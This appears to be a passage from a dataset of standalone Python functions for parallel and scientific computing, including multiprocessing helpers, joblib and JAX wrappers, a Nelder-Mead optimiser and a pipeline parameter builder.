true\n # also didn't allow me to pass this into the kernel.\n # Now I'm doing this here:\n dummy = np.zeros(fft_data.data.shape, dtype=fft_data.data.dtype)\n dummy[:] = fft_data.data[:]\n\n t1_calc = datetime.datetime.now()\n kernel[num_blocks, threads_per_block](dummy, result, ch1_idx_arr, ch2_idx_arr, win_factor)\n\n t2_calc = datetime.datetime.now()\n\n t1_io = datetime.datetime.now()\n storage_backend.store_data(result, info_dict)\n dt_io = datetime.datetime.now() - t1_io\n\n with open(f\"outfile_{comm.rank:03d}.txt\", \"a\") as df:\n # df.write(f\"success: num_blocks={num_blocks}, tpb={threads_per_block}... {fft_data.data.dtype}, {fft_data.data.shape}... \")\n # df.write(f\"dummy: {dummy.flags}, fft_data.data: {fft_data.data.flags}\")\n df.write((f\"rank {comm.rank:03d}/{comm.size:03d}: \"\n f\"tidx={info_dict['chunk_idx']} {info_dict['analysis_name']} \"\n f\"start {t1_calc.isoformat(sep=' ')} \"\n f\"end {t2_calc.isoformat(sep=' ')} \"\n f\"Storage: {dt_io} {gethostname()}\\n\"))\n df.flush()\n\n return None", "def with_numpy(func):\r\n return func", "def test_default(self):\n varargs = ()\n kwargs = {}\n method = getattr(self.foo,'f_default')\n var_dict = reassign_function_arguments(method, varargs, kwargs)\n self.assert_(var_dict['default'] == 1)\n self.assert_(len(var_dict) == 1)", "def do_partask(fn, jobs, _args=None, blocking=True,\n combfn=None, init=None,\n pass_idx=False,\n singleproc=False,\n manager=None,\n pass_queue=None,\n N=None):\n if singleproc or N == 1:\n moreargs = ()\n if pass_idx:\n moreargs += (0,)\n if pass_queue != None:\n moreargs += (pass_queue,)\n return fn(jobs, _args, *moreargs)\n\n if manager == None:\n print \"...creating new Manager...\"\n manager = multiprocessing.Manager()\n else:\n print \"...Received Your Manager, roger...\"\n queue = manager.Queue()\n\n p = multiprocessing.Process(target=spawn_jobs, args=(queue, fn, jobs, _args, pass_idx, pass_queue, N))\n p.start()\n\n num_jobs = len(jobs)\n if combfn == None:\n combfn = combfn_lst\n init = []\n elif combfn == 'dict':\n combfn = combfn_dict\n init = {}\n elif combfn == 'ignore':\n combfn = combfn_ignore\n init = True\n \n results = init\n while True:\n subresults = queue.get()\n if isinstance(subresults, POOL_CLOSED):\n return results\n results = combfn(results, subresults)\n return results", "def run_multiprocessing(args, function):\n vcf_fn = args.data_file\n num_processes = args.num_threads\n if num_processes > 1:\n # Split the VCF into chunks\n callset = allel.read_vcf(vcf_fn, fields=[\"variants/CHROM\", \"variants/POS\"])\n pos_list = callset[\"variants/POS\"]\n chroms = callset[\"variants/CHROM\"]\n assert np.all(chroms == chroms[0])\n chrom = str(chroms[0])\n\n def get_chromosome_chunks(lst, num_processes):\n length = len(lst)\n n = math.ceil(length / num_processes)\n chunks = list()\n for index, i in enumerate(range(0, length, n)):\n if index != num_processes - 1:\n chunks.append(\n (\n args,\n args.output_file + str(index),\n (chrom + \":\" + str(lst[i]) + \"-\" + str(lst[i + n])),\n )\n )\n else:\n chunks.append(\n (\n args,\n args.output_file + str(index),\n (chrom + \":\" + str(lst[i]) + \"-\" + str(lst[-1])),\n )\n )\n return chunks\n\n chunks = get_chromosome_chunks(pos_list, num_processes)\n chunks_iter = iter(chunks)\n reports = list()\n completed_files = list()\n with multiprocessing.Pool(processes=num_processes, maxtasksperchild=10) as pool:\n for index, row in enumerate(pool.map(function, chunks_iter)):\n reports.append(row)\n print(\n \"Processed Chunk {}: {} with {} sites added.\".format(\n index, chunks[index][2], row[\"num_sites\"]\n )\n )\n if row[\"num_sites\"] > 0:\n completed_files.append(index)\n else:\n os.remove(args.output_file + str(index) + \"-lock\")\n\n # Combine reports and print\n master_report = reports[0]\n for report in reports[1:]:\n for var_type, val in report.items():\n master_report[var_type] += val\n print(master_report)\n\n # Combine sampledata files\n filenames = completed_files\n all_samples = []\n for name in filenames:\n all_samples.append(tsinfer.load(args.output_file + str(name)))\n os.remove(args.output_file + str(name))\n\n samples = all_samples[0].copy(args.output_file)\n samples.append_sites(*all_samples[1:])\n samples.finalise()\n assert np.all(np.diff(samples.sites_position[:]) > 0)\n\n else:\n raise ValueError", "def joblib_batch_evaluator(\n func,\n arguments,\n *,\n n_cores=N_CORES,\n error_handling=\"continue\",\n unpack_symbol=None,\n):\n _check_inputs(func, arguments, n_cores, error_handling, unpack_symbol)\n n_cores = int(n_cores) if int(n_cores) >= 2 else 1\n\n reraise = error_handling == \"raise\"\n\n @unpack(symbol=unpack_symbol)\n @catch(default=\"__traceback__\", reraise=reraise)\n def internal_func(*args, **kwargs):\n return func(*args, **kwargs)\n\n if n_cores == 1:\n res = [internal_func(arg) for arg in arguments]\n else:\n res = Parallel(n_jobs=n_cores)(delayed(internal_func)(arg) for arg in arguments)\n\n return res", "def parallelizer(func, arg=False):\n if arg:\n func(arg)\n else:\n func()", "def fmin(func, x0, args=(), kw=dict(), xtol=1e-4, ftol=1e-4, maxiter=None, maxfun=None,\n full_output=0, disp=1, retall=0, callback=None, zdelt = 0.00025, nonzdelt = 0.05, \n holdfixed=None):\n # 2011-04-13 14:26 IJMC: Adding Keyword option\n # 2011-05-11 10:48 IJMC: Added the zdelt and nonzdelt options\n # 2011-05-30 15:36 IJMC: Added the holdfixed option\n\n def wrap_function(function, args, **kw):\n ncalls = [0]\n def function_wrapper(x):\n ncalls[0] += 1\n return function(x, *args, **kw)\n return ncalls, function_wrapper\n\n # Set up holdfixed arrays\n if holdfixed is not None:\n holdfixed = np.array(holdfixed)\n #x0[holdfixed] = x0[holdfixed]\n holdsome = True\n else:\n holdsome = False\n #holdfixed = np.zeros(params.size, dtype=bool)\n \n #if holdsome:\n # print \"holdfixed>>\", holdfixed\n\n fcalls, func = wrap_function(func, args, **kw)\n x0 = np.asfarray(x0).flatten()\n xoriginal = x0.copy()\n N = len(x0)\n rank = len(x0.shape)\n if not -1 < rank < 2:\n raise ValueError, \"Initial guess must be a scalar or rank-1 sequence.\"\n if maxiter is None:\n maxiter = N * 200\n if maxfun is None:\n maxfun = N * 200\n\n rho = 1; chi = 2; psi = 0.5; sigma = 0.5;\n one2np1 = range(1,N+1)\n\n if rank == 0:\n sim = np.zeros((N+1,), dtype=x0.dtype)\n else:\n sim = np.zeros((N+1,N), dtype=x0.dtype)\n fsim = np.zeros((N+1,), float)\n sim[0] = x0\n if retall:\n allvecs = [sim[0]]\n #print func.__name__\n #print x0\n fsim[0] = func(x0)\n for k in range(0,N):\n y = np.array(x0,copy=True)\n if y[k] != 0:\n y[k] = (1+nonzdelt)*y[k]\n else:\n y[k] = zdelt\n if holdsome and k in holdfixed:\n y[k] = xoriginal[k]\n sim[k+1] = y\n f = func(y)\n fsim[k+1] = f\n\n ind = np.argsort(fsim)\n fsim = np.take(fsim,ind,0)\n # sort so sim[0,:] has the lowest function value\n sim = np.take(sim,ind,0)\n\n iterations = 1\n\n while (fcalls[0] < maxfun and iterations < maxiter):\n ### IJC Edit to understand fmin!\n ##print 'xtol>> ' + str(max(np.ravel(abs(sim[1:]-sim[0])))) + ' > ' + str(xtol)\n ##print 'ftol>> ' + str(max(abs(fsim[0]-fsim[1:]))) + ' > ' + str(ftol)\n if (max(np.ravel(abs(sim[1:]-sim[0]))) <= xtol \\\n and max(abs(fsim[0]-fsim[1:])) <= ftol):\n break\n\n xbar = np.add.reduce(sim[:-1],0) / N\n xr = (1+rho)*xbar - rho*sim[-1]\n if holdsome:\n xr[holdfixed] = xoriginal[holdfixed]\n fxr = func(xr)\n doshrink = 0\n\n if fxr < fsim[0]:\n xe = (1+rho*chi)*xbar - rho*chi*sim[-1]\n if holdsome:\n xe[holdfixed] = xoriginal[holdfixed]\n fxe = func(xe)\n\n if fxe < fxr:\n sim[-1] = xe\n fsim[-1] = fxe\n else:\n sim[-1] = xr\n fsim[-1] = fxr\n else: # fsim[0] <= fxr\n if fxr < fsim[-2]:\n sim[-1] = xr\n fsim[-1] = fxr\n else: # fxr >= fsim[-2]\n # Perform contraction\n if fxr < fsim[-1]:\n xc = (1+psi*rho)*xbar - psi*rho*sim[-1]\n if holdsome:\n xc[holdfixed] = xoriginal[holdfixed]\n fxc = func(xc)\n\n if fxc <= fxr:\n sim[-1] = xc\n fsim[-1] = fxc\n else:\n doshrink=1\n else:\n # Perform an inside contraction\n xcc = (1-psi)*xbar + psi*sim[-1]\n if holdsome:\n xcc[holdfixed] = xoriginal[holdfixed]\n fxcc = func(xcc)\n\n if fxcc < fsim[-1]:\n sim[-1] = xcc\n fsim[-1] = fxcc\n else:\n doshrink = 1\n\n if doshrink:\n for j in one2np1:\n sim[j] = sim[0] + sigma*(sim[j] - sim[0])\n if holdsome:\n sim[j, holdfixed] = xoriginal[holdfixed]\n fsim[j] = func(sim[j])\n\n ind = np.argsort(fsim)\n sim = np.take(sim,ind,0)\n fsim = np.take(fsim,ind,0)\n if callback is not None:\n callback(sim[0])\n iterations += 1\n if retall:\n allvecs.append(sim[0])\n\n x = sim[0]\n fval = min(fsim)\n warnflag = 0\n\n if fcalls[0] >= maxfun:\n warnflag = 1\n if disp:\n print \"Warning: Maximum number of function evaluations has \"\\\n \"been exceeded.\"\n elif iterations >= maxiter:\n warnflag = 2\n if disp:\n print \"Warning: Maximum number of iterations has been exceeded\"\n else:\n if disp:\n print \"Optimization terminated successfully.\"\n print \" Current function value: %f\" % fval\n print \" Iterations: %d\" % iterations\n print \" Function evaluations: %d\" % fcalls[0]\n\n\n if full_output:\n retlist = x, fval, iterations, fcalls[0], warnflag\n if retall:\n retlist += (allvecs,)\n else:\n retlist = x\n if retall:\n retlist = (x, allvecs)\n\n return retlist", "def applymap_nb(a, map_func_nb, *args):\n out = np.full_like(a, np.nan, dtype=np.float_)\n\n for col in range(out.shape[1]):\n idxs = np.flatnonzero(~np.isnan(a[:, col]))\n for i in idxs:\n out[i, col] = map_func_nb(i, col, a[i, col], *args)\n return out", "def autovectorized(f):\r\n def wrapper(input):\r\n if N.isscalar(input)==False:\r\n return N.vectorize(f)(input)\r\n return f(input)\r\n return wrapper", "def autovectorized(f):\r\n def wrapper(input):\r\n if N.isscalar(input)==False:\r\n return N.vectorize(f)(input)\r\n return f(input)\r\n return wrapper", "def _init_matrix(matrices, transform_func, default_val):\n if matrices is None:\n return default_val\n return transform_func(matrices)", "def _apply_defaults(func, args, kwargs):\n\n sig = signature(func)\n bound_arguments = sig.bind(*args, **kwargs)\n for param in sig.parameters.values():\n if param.name not in bound_arguments.arguments:\n bound_arguments.arguments[param.name] = param.default\n args = [bound_arguments.arguments[key] for key in sig.parameters.keys()]\n return args, {}", "def test_jitable_funcs(self):\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = None\n\n self.basic_lindblad.evaluation_mode = \"dense_vectorized\"\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = None", "def numba_check():\n numba = importlib.util.find_spec(\"numba\")\n return numba is not None", "def jit(fn=None, input_signature=None, hash_args=None, jit_config=None):\n\n def wrap_mindspore(func):\n if hash_args:\n hash_obj = _get_jit_hash(hash_args)\n else:\n hash_obj = int(time.time() * 1e9)\n\n @wraps(func)\n def staging_specialize(*args, **kwargs):\n if os.getenv(\"MS_JIT\") == '0':\n return func(*args, **kwargs)\n\n args, kwargs = _handle_func_args(func, *args, **kwargs)\n\n process_obj = None\n if args and not isinstance(args[0], PythonTensor) and hasattr(args[0], func.__name__):\n process_obj = args[0]\n # only the function or cell instance wrapped by shard will fall into this branch\n if _is_pynative_parallel() and func.__name__ == _PYNATIVE_PARALLEL_FUNC_NAME:\n process_obj = hash_args\n out = _MindsporeFunctionExecutor(func, hash_obj, input_signature, process_obj, jit_config)(*args, **kwargs)\n return out\n\n return staging_specialize\n\n if fn is not None:\n return wrap_mindspore(fn)\n return wrap_mindspore", "def parfor(fn, niters, fixed_args = (), ee = shared_exec_engine):\n assert isinstance(fn, Function), \\\n \"Can only run LLVM functions, not %s\" % type(fn)\n \n # in case fixed arguments aren't yet GenericValues, convert them\n fixed_args = tuple(gv_from_python(v, arg.type) \n for (v,arg) in \n zip(fixed_args, fn.args))\n iter_ranges, steps, shape = parse_iters(niters)\n result_lltype = return_type(fn) \n if result_lltype == ty_void:\n work_fn = parfor_wrapper(fn, steps)\n launch(work_fn, iter_ranges, fixed_args, ee)\n return \n else:\n assert is_llvm_float_type(result_lltype) or is_llvm_int_type(result_lltype)\n dtype = lltype_to_dtype(result_lltype)\n result_array = np.empty(shape = shape, dtype = dtype)\n fixed_args = (GenericValue.pointer(result_array.ctypes.data),) + fixed_args\n work_fn = parfor_wrapper(fn, steps, shape)\n n_given = len(fixed_args) + 2*len(steps)\n n_expected = len(work_fn.args)\n assert n_given == n_expected, \\\n \"Work function expects %d arguments but got %d\" % (n_expected, n_given)\n launch(work_fn, iter_ranges, fixed_args, ee)\n return result_array\n assert False, \"Collecting results not yet implemented\"", "def test_valid_n_jobs(n_jobs: Any) -> None:\n check_n_jobs(n_jobs)", "def test_increment_input_with_threads():\r\n a = [0]\r\n Parallel(n_jobs=2, backend=\"threading\")(\r\n delayed(increment_input)(a) for _ in range(5))\r\n nose.tools.assert_equal(a, [5])", "def __init__(self, defaults={}, data=None):\n\n super().__init__(\n defaults={**OptimizationParameters.parameters, **defaults}, data=data\n )", "def EM_numba(F,G,Y0,T=100,N=500000):\n\n Y0 = np.array(Y0)\n Y = np.zeros((Y0.shape[0],N+1))\n Y[:,0]=Y0\n dt = T/N\n t=np.linspace(0,T,N+1)\n\n for jt in range(0,N):\n Y[:,jt+1]=_EM_step(F,G,Y[:,jt],dt)\n\n return t,Y", "def __call__(self, *args, **kwargs):\n # TODO: figure out how to check if we are using a jobserver-supporting ninja,\n # the two split ninja packages make this very difficult right now\n parallel = should_set_parallel_jobs(jobserver_support=True) and kwargs.pop(\n \"parallel\", self.jobs > 1\n )\n\n if parallel:\n args = (\"-j{0}\".format(self.jobs),) + args\n jobs_env = kwargs.pop(\"jobs_env\", None)\n if jobs_env:\n # Caller wants us to set an environment variable to\n # control the parallelism.\n kwargs[\"extra_env\"] = {jobs_env: str(self.jobs)}\n\n return super(MakeExecutable, self).__call__(*args, **kwargs)", "def compute(args, fun, max_workers=6):\n print(\"\\nProcessing symbols in parallel\")\n ex = futures.ThreadPoolExecutor(max_workers=max_workers)\n ex.map(fun, args)", "def parallelize(func: callable, iterable, func_args: tuple=None, func_kwargs: dict=None, njobs=None, no_progress=False, **pbar_kw):\n if func_args is None:\n func_args = ()\n if func_kwargs is None:\n func_kwargs = {}\n njobs = get_njobs(njobs)\n\n if 'total' not in pbar_kw:\n try:\n n = len(iterable)\n pbar_kw['total'] = n\n except TypeError:\n pass\n\n delayed = joblib.delayed\n\n if no_progress or not HAS_TQDM:\n res = joblib.Parallel(n_jobs=njobs)(\n delayed(func)(x, *func_args, **func_kwargs)\n for x in iterable\n )\n else:\n with tqdm_joblib(**pbar_kw):\n res = joblib.Parallel(n_jobs=njobs)(\n delayed(func)(x, *func_args, **func_kwargs)\n for x in iterable\n )\n return res", "def parallel_calculation(self, serial_fun, init_config, **kwargs):\r\n burned_in_config = self.burn_in(init_config, **kwargs)\r\n num_processes = 1\r\n if platform in ('linux', 'linux2'):\r\n num_processes = kwargs.get('num_processes', mp.cpu_count())\r\n if num_processes > 1:\r\n output = mp.Queue()\r\n\r\n def fun(seed, output):\r\n output.put(\r\n serial_fun(\r\n burned_in_config,\r\n urng=np.random.RandomState(seed).random, **kwargs\r\n )\r\n )\r\n\r\n processes = [\r\n mp.Process(target=fun, args=(seed, output))\r\n for seed in np.random.randint(88, size=num_processes)\r\n ]\r\n for p in processes:\r\n p.start()\r\n for p in processes:\r\n p.join()\r\n process_results = [output.get() for p in processes]\r\n return np.mean(process_results)\r\n return serial_fun(burned_in_config, **kwargs)", "def _chunk_vmapped_function(vmapped_fun, chunk_size, argnums=0):\n\n if chunk_size is None:\n return vmapped_fun\n\n if isinstance(argnums, int):\n argnums = (argnums,)\n\n def _fun(*args):\n\n n_elements = jax.tree_leaves(args[argnums[0]])[0].shape[0]\n n_chunks, n_rest = divmod(n_elements, chunk_size)\n\n if n_chunks == 0 or chunk_size >= n_elements:\n y = vmapped_fun(*args)\n else:\n # split inputs\n def _get_chunks(x):\n x_chunks = jax.tree_map(lambda x_: x_[: n_elements - n_rest, ...], x)\n x_chunks = _chunk(x_chunks, chunk_size)\n return x_chunks\n\n def _get_rest(x):\n x_rest = jax.tree_map(lambda x_: x_[n_elements - n_rest :, ...], x)\n return x_rest\n\n args_chunks = [\n _get_chunks(a) if i in argnums else a for i, a in enumerate(args)\n ]\n args_rest = [\n _get_rest(a) if i in argnums else a for i, a in enumerate(args)\n ]\n\n y_chunks = _unchunk(\n scanmap(vmapped_fun, scan_append, argnums)(*args_chunks)\n )\n\n if n_rest == 0:\n y = y_chunks\n else:\n y_rest = vmapped_fun(*args_rest)\n y = jax.tree_map(\n lambda y1, y2: jnp.concatenate((y1, y2)), y_chunks, y_rest\n )\n return y\n\n return _fun", "def fun_par_dict(fun: Callable, *args):\n if len(args) > 0:\n return fun(*args[:-1], **args[-1])\n else:\n return fun()", "def _get_default_pipeline_params(\n project: str,\n location: str,\n root_dir: str,\n target_column: str,\n prediction_type: str,\n optimization_objective: str,\n transformations: str,\n train_budget_milli_node_hours: float,\n stage_1_num_parallel_trials: Optional[int] = None,\n stage_2_num_parallel_trials: Optional[int] = None,\n stage_2_num_selected_trials: Optional[int] = None,\n data_source_csv_filenames: Optional[str] = None,\n data_source_bigquery_table_path: Optional[str] = None,\n predefined_split_key: Optional[str] = None,\n timestamp_split_key: Optional[str] = None,\n stratified_split_key: Optional[str] = None,\n training_fraction: Optional[float] = None,\n validation_fraction: Optional[float] = None,\n test_fraction: Optional[float] = None,\n weight_column: Optional[float] = None,\n study_spec_parameters_override: Optional[List[Dict[str, Any]]] = None,\n optimization_objective_recall_value: Optional[float] = None,\n optimization_objective_precision_value: Optional[float] = None,\n stage_1_tuner_worker_pool_specs_override: Optional[Dict[str, Any]] = None,\n cv_trainer_worker_pool_specs_override: Optional[Dict[str, Any]] = None,\n export_additional_model_without_custom_ops: bool = False,\n stats_and_example_gen_dataflow_machine_type: Optional[str] = None,\n stats_and_example_gen_dataflow_max_num_workers: Optional[int] = None,\n stats_and_example_gen_dataflow_disk_size_gb: Optional[int] = None,\n transform_dataflow_machine_type: Optional[str] = None,\n transform_dataflow_max_num_workers: Optional[int] = None,\n transform_dataflow_disk_size_gb: Optional[int] = None,\n dataflow_subnetwork: Optional[str] = None,\n dataflow_use_public_ips: bool = True,\n encryption_spec_key_name: Optional[str] = None,\n additional_experiments: Optional[Dict[str, Any]] = None,\n dataflow_service_account: Optional[str] = None,\n max_selected_features: Optional[int] = None,\n apply_feature_selection_tuning: bool = False,\n run_evaluation: bool = True,\n evaluation_batch_predict_machine_type: Optional[str] = None,\n evaluation_batch_predict_starting_replica_count: Optional[int] = None,\n evaluation_batch_predict_max_replica_count: Optional[int] = None,\n evaluation_batch_explain_machine_type: Optional[str] = None,\n evaluation_batch_explain_starting_replica_count: Optional[int] = None,\n evaluation_batch_explain_max_replica_count: Optional[int] = None,\n evaluation_dataflow_machine_type: Optional[str] = None,\n evaluation_dataflow_starting_num_workers: Optional[int] = None,\n evaluation_dataflow_max_num_workers: Optional[int] = None,\n evaluation_dataflow_disk_size_gb: Optional[int] = None,\n run_distillation: bool = False,\n distill_batch_predict_machine_type: Optional[str] = None,\n distill_batch_predict_starting_replica_count: Optional[int] = None,\n distill_batch_predict_max_replica_count: Optional[int] = None,\n stage_1_tuning_result_artifact_uri: Optional[str] = None,\n quantiles: Optional[List[float]] = None,\n enable_probabilistic_inference: bool = False,\n num_selected_features: Optional[int] = None,\n model_display_name: str = '',\n model_description: str = '',\n) -> Dict[str, Any]:\n if not study_spec_parameters_override:\n study_spec_parameters_override = []\n if not stage_1_tuner_worker_pool_specs_override:\n stage_1_tuner_worker_pool_specs_override = []\n if not cv_trainer_worker_pool_specs_override:\n cv_trainer_worker_pool_specs_override = []\n if not quantiles:\n quantiles = []\n\n parameter_values = {}\n parameters = {\n 'project': project,\n 'location': location,\n 'root_dir': root_dir,\n 'target_column': target_column,\n 'prediction_type': prediction_type,\n 'data_source_csv_filenames': data_source_csv_filenames,\n 'data_source_bigquery_table_path': data_source_bigquery_table_path,\n 'predefined_split_key': predefined_split_key,\n 'timestamp_split_key': timestamp_split_key,\n 'stratified_split_key': stratified_split_key,\n 'training_fraction': training_fraction,\n 'validation_fraction': validation_fraction,\n 'test_fraction': test_fraction,\n 'optimization_objective': optimization_objective,\n 'train_budget_milli_node_hours': train_budget_milli_node_hours,\n 'stage_1_num_parallel_trials': stage_1_num_parallel_trials,\n 'stage_2_num_parallel_trials': stage_2_num_parallel_trials,\n 'stage_2_num_selected_trials': stage_2_num_selected_trials,\n 'weight_column': weight_column,\n 'optimization_objective_recall_value': (\n optimization_objective_recall_value\n ),\n 'optimization_objective_precision_value': (\n optimization_objective_precision_value\n ),\n 'study_spec_parameters_override': study_spec_parameters_override,\n 'stage_1_tuner_worker_pool_specs_override': (\n stage_1_tuner_worker_pool_specs_override\n ),\n 'cv_trainer_worker_pool_specs_override': (\n cv_trainer_worker_pool_specs_override\n ),\n 'export_additional_model_without_custom_ops': (\n export_additional_model_without_custom_ops\n ),\n 'dataflow_subnetwork': dataflow_subnetwork,\n 'dataflow_use_public_ips': dataflow_use_public_ips,\n 'dataflow_service_account': dataflow_service_account,\n 'encryption_spec_key_name': encryption_spec_key_name,\n 'max_selected_features': max_selected_features,\n 'stage_1_tuning_result_artifact_uri': stage_1_tuning_result_artifact_uri,\n 'quantiles': quantiles,\n 'enable_probabilistic_inference': enable_probabilistic_inference,\n 'model_display_name': model_display_name,\n 'model_description': model_description,\n }\n parameter_values.update(\n {param: value for param, value in parameters.items() if value is not None}\n )\n\n if run_evaluation:\n eval_parameters = {\n 'evaluation_batch_predict_machine_type': (\n evaluation_batch_predict_machine_type\n ),\n 'evaluation_batch_predict_starting_replica_count': (\n evaluation_batch_predict_starting_replica_count\n ),\n 'evaluation_batch_predict_max_replica_count': (\n evaluation_batch_predict_max_replica_count\n ),\n 'evaluation_batch_explain_machine_type': (\n evaluation_batch_explain_machine_type\n ),\n 'evaluation_batch_explain_starting_replica_count': (\n evaluation_batch_explain_starting_replica_count\n ),\n 'evaluation_batch_explain_max_replica_count': (\n evaluation_batch_explain_max_replica_count\n ),\n 'evaluation_dataflow_machine_type': evaluation_dataflow_machine_type,\n 'evaluation_dataflow_starting_num_workers': (\n evaluation_dataflow_starting_num_workers\n ),\n 'evaluation_dataflow_max_num_workers': (\n evaluation_dataflow_max_num_workers\n ),\n 'evaluation_dataflow_disk_size_gb': evaluation_dataflow_disk_size_gb,\n 'run_evaluation': run_evaluation,\n }\n parameter_values.update(\n {\n param: value\n for param, value in eval_parameters.items()\n if value is not None\n }\n )\n\n # V1 pipeline without FTE\n if num_selected_features is None:\n if not additional_experiments:\n additional_experiments = {}\n\n parameters = {\n 'transformations': transformations,\n 'stats_and_example_gen_dataflow_machine_type': (\n stats_and_example_gen_dataflow_machine_type\n ),\n 'stats_and_example_gen_dataflow_max_num_workers': (\n stats_and_example_gen_dataflow_max_num_workers\n ),\n 'stats_and_example_gen_dataflow_disk_size_gb': (\n stats_and_example_gen_dataflow_disk_size_gb\n ),\n 'transform_dataflow_machine_type': transform_dataflow_machine_type,\n 'transform_dataflow_max_num_workers': (\n transform_dataflow_max_num_workers\n ),\n 'transform_dataflow_disk_size_gb': transform_dataflow_disk_size_gb,\n 'additional_experiments': additional_experiments,\n }\n parameter_values.update(\n {\n param: value\n for param, value in parameters.items()\n if value is not None\n }\n )\n\n if apply_feature_selection_tuning:\n parameter_values.update({\n 'apply_feature_selection_tuning': apply_feature_selection_tuning,\n })\n\n if run_distillation:\n distillation_parameters = {\n 'distill_batch_predict_machine_type': (\n distill_batch_predict_machine_type\n ),\n 'distill_batch_predict_starting_replica_count': (\n distill_batch_predict_starting_replica_count\n ),\n 'distill_batch_predict_max_replica_count': (\n distill_batch_predict_max_replica_count\n ),\n 'run_distillation': run_distillation,\n }\n parameter_values.update(\n {\n param: value\n for param, value in distillation_parameters.items()\n if value is not None\n }\n )\n\n # V2 pipeline (with FTE)\n else:\n if run_distillation:\n raise ValueError(\n 'Distillation is currently not supported'\n ' when num_selected_features is specified.'\n )\n\n parameters = {\n 'num_selected_features': num_selected_features,\n 'dataset_level_custom_transformation_definitions': [],\n 'dataset_level_transformations': [],\n 'tf_auto_transform_features': {},\n 'tf_custom_transformation_definitions': [],\n 'legacy_transformations_path': transformations,\n 'feature_transform_engine_dataflow_machine_type': (\n transform_dataflow_machine_type\n ),\n 'feature_transform_engine_dataflow_max_num_workers': (\n transform_dataflow_max_num_workers\n ),\n 'feature_transform_engine_dataflow_disk_size_gb': (\n transform_dataflow_disk_size_gb\n ),\n }\n parameter_values.update(\n {\n param: value\n for param, value in parameters.items()\n if value is not None\n }\n )\n\n return parameter_values", "def grid_search(func, param_grid, wrapper=None, n_jobs=1, verbose=0):\n if wrapper is None:\n wrapper = _default_wrapper\n # check if enough memory\n size_ = _get_final_size(param_grid)\n if size_ > 0.9 * psutil.virtual_memory().available:\n raise MemoryError(\"not enough memory 'param_grid'\"\n \" weigh {0} ..\".format(humanize.naturalsize(size_)))\n # sanitize value to list type\n for key, value in param_grid.iteritems():\n if not isinstance(value, list):\n param_grid[key] = [value]\n list_kwargs = [dict(zip(param_grid, x))\n for x in itertools.product(*param_grid.values())]\n # Run the reconstruction\n if verbose > 0:\n if n_jobs == -1:\n n_jobs_used = psutil.cpu_count()\n elif n_jobs == -2:\n n_jobs_used = psutil.cpu_count() - 1\n else:\n n_jobs_used = n_jobs\n print((\"Running grid_search for {0} candidates\"\n \" on {1} jobs\").format(len(list_kwargs), n_jobs_used))\n res = Parallel(n_jobs=n_jobs, verbose=verbose)(\n delayed(wrapper)(func, **kwargs)\n for kwargs in list_kwargs)\n return list_kwargs, res", "def c_torch_score_mp(ve, xs, y, func_index, n_jobs=1, return_numpy=False, clf=False, single_start=6):\n if isinstance(ve, np.ndarray):\n ve = ve.tolist()\n if n_jobs == 1:\n return c_torch_score(ve, xs, y, func_index, return_numpy, clf, single_start=single_start)\n else:\n for i in range(3):\n print(\"For torch with c++ (c_torch), with n_jobs>1, this function is very slow!\")\n\n pool = Pool(n_jobs)\n\n left = int(len(ve) % n_jobs)\n\n if left > 0:\n bs = int(len(ve) // n_jobs)\n nve = [ve[bs * (i - 1):i * bs] for i in range(1, n_jobs + 1)]\n nve.append(ve[-left:])\n else:\n bs = int(len(ve) // n_jobs)\n nve = [ve[bs * (i - 1):i * bs] for i in range(1, n_jobs + 1)]\n\n res = []\n for nvei in nve:\n ret = pool.apply(c_torch_score_temp, (nvei, xs, y, func_index, clf, single_start))\n res.append(ret)\n pool.close()\n pool.join()\n\n if not return_numpy:\n res = torch.cat(res)\n else:\n res = np.concatenate(res)\n return res", "def jac_pnp(beta, **kw):\n temp = kw.get('temp', 85)\n rate_source_ = kw.get('rate_source', 1E-4)\n DSIN_ = kw.get('DSIN', 3.92E-16)\n stress_voltage = kw.get('stress_voltage', 3.75)\n L1_ = kw.get('L1', 0.075)\n N1_ = int(kw.get('N1', 100))\n tsteps_ = int(kw.get('tsteps', 720))\n time_s = kw.get('time_s', np.array([0]))\n rsh_norm_ = kw.get('rsh_norm', np.array([0]))\n print('Called jac_pnp')\n\n S0_ = 10 ** beta[0]\n h_ = 10 ** beta[1]\n DSF_ = 10 ** beta[2]\n # y0 = ml_pid.simulate_rsh(\n # S0=S0_, h=h_, DSF=DSF_, simulation_time=np.amax(time_s) * 1.1,\n # temperature=temp, rate_source=rate_source_, DSIN=DSIN_,\n # stress_voltage=stress_voltage, L1=L1_, m=1, time_steps=tsteps_,\n # N1=N1_\n # )\n\n EPS_ = np.finfo(np.float).eps\n delta = EPS_ ** (1 / 3)\n delta = 1E-1\n\n # forward\n # derivparams_forward = []\n derivparams = []\n for i in range(len(beta)):\n copy = np.array(beta)\n copy[i] += delta\n derivparams.append(copy)\n # backward\n # derivparams_backward = []\n for i in range(len(beta)):\n copy = np.array(beta)\n copy[i] -= delta\n derivparams.append(copy)\n\n # results_forward = pool.map(partial(func, **kw), derivparams_forward)\n # results_backward = pool.map(partial(func, **kw), derivparams_backward)\n results = np.array(pool.map(partial(func, **kw), derivparams))\n [m, n] = results.shape\n idx = int(m / 2)\n results_forward = results[0:idx, :]\n results_backward = results[idx::,:]\n derivs = [(rf - rb) / (2.0 * delta) for rf, rb in zip(results_forward, results_backward)]\n return np.array(derivs).T", "def run_migrad(self, fitarg, **kwargs):\n self.fitarg = fitarg\n kwargs['up'] = 1.\n\n\n logging.debug(self._par_names)\n logging.debug(self.__wrap_likelihood(list(fitarg['pinit'].values())))\n\n if kwargs['scipy']:\n self._res = op.minimize(self.__wrap_likelihood,\n list(fitarg['pinit'].values()),\n bounds=list(fitarg['limits'].values()),\n method='TNC',\n #method='Powell',\n 